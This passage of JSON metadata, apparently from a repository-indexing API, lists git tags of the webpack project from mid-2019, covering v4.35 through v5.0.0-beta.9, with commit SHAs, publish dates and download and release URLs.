,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://c